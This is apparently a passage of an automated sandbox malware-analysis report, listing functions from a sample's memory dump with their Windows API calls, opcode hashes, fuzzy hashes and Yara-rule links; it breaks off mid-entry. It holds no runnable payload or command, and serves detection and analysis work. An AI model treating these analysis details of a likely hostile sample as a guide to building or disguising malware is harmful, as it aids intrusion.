                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 2738559852-0
                                                                                                          • Opcode ID: d8cdd3417b836179e06d70530ffc200518a65aecddc11ebe8079a13f5c9edfa7
                                                                                                          • Instruction ID: ee96c74c4bd12cc8c0b76ea388b8440a991a590c452f8625021fbeb35d61be9b
                                                                                                          • Opcode Fuzzy Hash: d8cdd3417b836179e06d70530ffc200518a65aecddc11ebe8079a13f5c9edfa7
                                                                                                          • Instruction Fuzzy Hash: D5113D752047119FD320CF55D480B62B7F5EF44719F14D91DE8AA9B6A0D770E889CB60
                                                                                                          Function 00E51A36 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 4104443479-0
                                                                                                          • Opcode ID: 602e865249ec947d912e947e17fccc617bf4509f125e4f05857fa8c8b0e3221e
                                                                                                          • Instruction ID: 49882e14e43c6e4050ca469b12a5b4c9a6329898e34507b8ca7feabe880b986f
                                                                                                          • Opcode Fuzzy Hash: 602e865249ec947d912e947e17fccc617bf4509f125e4f05857fa8c8b0e3221e
                                                                                                          • Instruction Fuzzy Hash: 8401F9722457016ED7255F38DC02F67BBD8DB447E0F10992EFA1ADA1D2EA31E4448790
                                                                                                          Function 00EB495B Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00EB4998
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EnvironmentVariable
                                                                                                          • String ID:
                                                                                                          • API String ID: 1431749950-0
                                                                                                          • Opcode ID: fbd7d25b188d98a9d5b2e95bd193ae36cfe0693a7872168dd8ef0904629b8ad7
                                                                                                          • Instruction ID: a3df1380391ab589ed01e2f0c9188353521638f1ec51a30c217c12f11058c815
                                                                                                          • Opcode Fuzzy Hash: fbd7d25b188d98a9d5b2e95bd193ae36cfe0693a7872168dd8ef0904629b8ad7
                                                                                                          • Instruction Fuzzy Hash: 75F0A475608104BF8B10FB65D806D9F77FCEF49320B001056F804AB2A2DE30BD41C760
                                                                                                          Function 00EA7C7F Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E60FE6: std::exception::exception.LIBCMT ref: 00E6101C
                                                                                                            • Part of subcall function 00E60FE6: __CxxThrowException@8.LIBCMT ref: 00E61031
                                                                                                          • _memset.LIBCMT ref: 00EA7CB4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw_memsetstd::exception::exception
                                                                                                          • String ID:
                                                                                                          • API String ID: 525207782-0
                                                                                                          • Opcode ID: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
                                                                                                          • Instruction ID: 30dcccae1244d3bee2905ae791898573149287898dfbb72ce0b0d140a118324f
                                                                                                          • Opcode Fuzzy Hash: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
                                                                                                          • Instruction Fuzzy Hash: 7801F674648200AFD321EF5CE941F46BBE5AF5D350F24845AF5889B392DB72E800CB90
                                                                                                          Function 00E54A8C Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _fseek
                                                                                                          • String ID:
                                                                                                          • API String ID: 2937370855-0
                                                                                                          • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                                                          • Instruction ID: add93bee2d85bad46ac0258fd5ffe121ef59e4e2bc1bfc574b688409e4e639ab
                                                                                                          • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                                                          • Instruction Fuzzy Hash: 73F085B6500208BFDF108F85EC00CEBBBB9EB89324F144598F9046A211D232EA21DBA0
                                                                                                          Function 00E54A2F Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00E527AF,?,00000001), ref: 00E54A63
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeLibrary
                                                                                                          • String ID:
                                                                                                          • API String ID: 3664257935-0
                                                                                                          • Opcode ID: 81924fe67ff1f63b3d4517cebbed6899c293e2a917a1c793190d85254fb9af5e
                                                                                                          • Instruction ID: b6d17050242572a85d402012e3ed71f5f00ec66eb3440ad3e2a0b9b636e55612
                                                                                                          • Opcode Fuzzy Hash: 81924fe67ff1f63b3d4517cebbed6899c293e2a917a1c793190d85254fb9af5e
                                                                                                          • Instruction Fuzzy Hash: B2F058B1141701CFCB748F24E480856BBE0AB0431A310AD2EE596A2652D3319988CB04
                                                                                                          Function 00E54AB2 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __fread_nolock
                                                                                                          • String ID:
                                                                                                          • API String ID: 2638373210-0
                                                                                                          • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                                                          • Instruction ID: c726f735b34162a3a75693c61a39fb0ab00af6621cc572c4bc0a655e49802ca0
                                                                                                          • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                                                          • Instruction Fuzzy Hash: C6F0587240020DFFDF04CF80C941EAABB79FB04314F208589FC189B252D336DA21AB90
                                                                                                          Function 00E609C5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00E609E4
                                                                                                            • Part of subcall function 00E51821: _memmove.LIBCMT ref: 00E5185B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LongNamePath_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 2514874351-0
                                                                                                          • Opcode ID: 481aaa969aded0c7f0e0d622faf3a5ca83cca5b89b07ada0c787be6fe0b8be4e
                                                                                                          • Instruction ID: c544843cb4cdf1a72138feef27ffb2e584eb8a58e7a8da34a7df6857686deb08
                                                                                                          • Opcode Fuzzy Hash: 481aaa969aded0c7f0e0d622faf3a5ca83cca5b89b07ada0c787be6fe0b8be4e
                                                                                                          • Instruction Fuzzy Hash: B6E086329002285BC721969C9C05FEE77DDDB89691F0442F7FC0CE7204D960AC858691
                                                                                                          Function 00EA4D18 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00EA4D31
                                                                                                            • Part of subcall function 00E51821: _memmove.LIBCMT ref: 00E5185B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FolderPath_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 3334745507-0
                                                                                                          • Opcode ID: 02201722b63a00c21cc66283f90a8c15087a6f2825f84590b8b7b893f06a152c
                                                                                                          • Instruction ID: 80e402a21ae997df77170a33dbe91321591676ecb03f44edc7aca5ebbe974e4f
                                                                                                          • Opcode Fuzzy Hash: 02201722b63a00c21cc66283f90a8c15087a6f2825f84590b8b7b893f06a152c
                                                                                                          • Instruction Fuzzy Hash: 1FD05EA190032C2FDB64E6A5AC0DEBB7BACD744221F000AE27C6CD3101E924AD4986E1
                                                                                                          Function 00EA394D Relevance: 1.5, APIs: 1, Instructions: 20fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00EA384C: SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000001,00000000,00000000,00EA3959,00000000,00000000,?,00E905DB,00EF8070,00000002,?,?), ref: 00EA38CA
                                                                                                          • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,?,00E905DB,00EF8070,00000002,?,?,?,00000000), ref: 00EA3967
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$PointerWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 539440098-0
                                                                                                          • Opcode ID: 6ca54ab1f23a1649f8e4c36f38d2ceb1448b69660ea9e9b25d889cfabe2a8948
                                                                                                          • Instruction ID: e1e091848ef5f82045f604c1f6995ffd9fcba7f3336da2c0a8d6d35b1eca3d26
                                                                                                          • Opcode Fuzzy Hash: 6ca54ab1f23a1649f8e4c36f38d2ceb1448b69660ea9e9b25d889cfabe2a8948
                                                                                                          • Instruction Fuzzy Hash: F3E04F35401208BFD720AF94D801B9AB7BCEB05310F00455AFD4095111D7B2AE149BA0
                                                                                                          Function 00EA3EF7 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00EA3E7D,?,?,?), ref: 00EA3F0D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CopyFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 1304948518-0
                                                                                                          • Opcode ID: 2eb831b94860f81766c43de453c4f3f6d5db74830ae8463f0dae32695353cc33
                                                                                                          • Instruction ID: 571c2282d0be30769c4858e631ce51045b25ca10eea395721c1f729064023ed5
                                                                                                          • Opcode Fuzzy Hash: 2eb831b94860f81766c43de453c4f3f6d5db74830ae8463f0dae32695353cc33
                                                                                                          • Instruction Fuzzy Hash: B5D0A7315E120CBFEF50DFA0DC06F68B7ACE701706F1002A4B504E90E0DA7269189795
                                                                                                          Function 00E542AE Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00E906E6,00000000,00000000,00000000), ref: 00E542BF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FilePointer
                                                                                                          • String ID:
                                                                                                          • API String ID: 973152223-0
                                                                                                          • Opcode ID: e26f219b4321f91efcad8139e39baa0d6a195aebd5ba55455f6d64ae89c3c9c8
                                                                                                          • Instruction ID: 302ff7b9b6c6781018faa63830ee9406402496175be11071d344990a7baddf9f
                                                                                                          • Opcode Fuzzy Hash: e26f219b4321f91efcad8139e39baa0d6a195aebd5ba55455f6d64ae89c3c9c8
                                                                                                          • Instruction Fuzzy Hash: FFD0C77464120CBFE710CB81DC46FAD777CE705710F100195FD0466290D6B27D548795
                                                                                                          Function 00EA4FEC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetFileAttributesW.KERNEL32(?,00EA3BFE), ref: 00EA4FED
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AttributesFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 3188754299-0
                                                                                                          • Opcode ID: 1bb5058066c13e6caf437f1b0c46ba07ac5fe9df7da0f860da1c099f0d610a09
                                                                                                          • Instruction ID: f9b28102bb48b2d1fcbc9bcfa677e5edd4c34393b353bbd0d6503619f38e08c7
                                                                                                          • Opcode Fuzzy Hash: 1bb5058066c13e6caf437f1b0c46ba07ac5fe9df7da0f860da1c099f0d610a09
                                                                                                          • Instruction Fuzzy Hash: 26B092BA1426005E9D281E3C294819937819B8B3ADBD83B82E478A94E19279A84BA520
                                                                                                          Function 00E6547B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __wfsopen
                                                                                                          • String ID:
                                                                                                          • API String ID: 197181222-0
                                                                                                          • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                          • Instruction ID: c332983a016e5553474e343f1425aaf63d3ef4719982d64952792dcc4d6dfdc4
                                                                                                          • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                          • Instruction Fuzzy Hash: 57B0927658020CB7CE112A82FC03A593B699B406A8F408060FB1C2C162AA73A6A09689
                                                                                                          Function 00EAD6BE Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetLastError.KERNEL32(00000002,00000000), ref: 00EAD842
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 1452528299-0
                                                                                                          • Opcode ID: bea13d665ce64d104c6a9df3659e0a9e8c58fbe0f6ac840da5f5345466cb1bbd
                                                                                                          • Instruction ID: ba6297724c69a2f9d6084f44bdf5faf29abb5330affd5a3f2c8f086a4ee3357b
                                                                                                          • Opcode Fuzzy Hash: bea13d665ce64d104c6a9df3659e0a9e8c58fbe0f6ac840da5f5345466cb1bbd
                                                                                                          • Instruction Fuzzy Hash: FA71A6742083018FC708EF64D891B5EB7E0AF89354F04596DF896AB7A2DB30ED09CB52
                                                                                                          Function 00EAC270 Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00EA4005: FindFirstFileW.KERNEL32(?,?), ref: 00EA407C
                                                                                                            • Part of subcall function 00EA4005: DeleteFileW.KERNEL32(?,?,?,?), ref: 00EA40CC
                                                                                                            • Part of subcall function 00EA4005: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00EA40DD
                                                                                                            • Part of subcall function 00EA4005: FindClose.KERNEL32(00000000), ref: 00EA40F4
                                                                                                          • GetLastError.KERNEL32 ref: 00EAC292
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                          • String ID:
                                                                                                          • API String ID: 2191629493-0
                                                                                                          • Opcode ID: d47697529b2bfcf0c3210dc963fc05ff63ef85df4a5987900b1802247be527f1
                                                                                                          • Instruction ID: 520afee539b33cecc70d2d91fd283fda988188c7669471887214ffcdcb221a28
                                                                                                          • Opcode Fuzzy Hash: d47697529b2bfcf0c3210dc963fc05ff63ef85df4a5987900b1802247be527f1
                                                                                                          • Instruction Fuzzy Hash: B2F0A0723106108FCB10EF59E840F6AB7E9EF89720F058419F949AB392CB70BC01CB94
                                                                                                          Function 00E542CF Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CloseHandle.KERNEL32(?,?,00000000,00E82F8B), ref: 00E542EF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseHandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 2962429428-0
                                                                                                          • Opcode ID: 012e7b50eccd67ad77627e8dee5f50990fb6c57746bd8299ecc7abd969425133
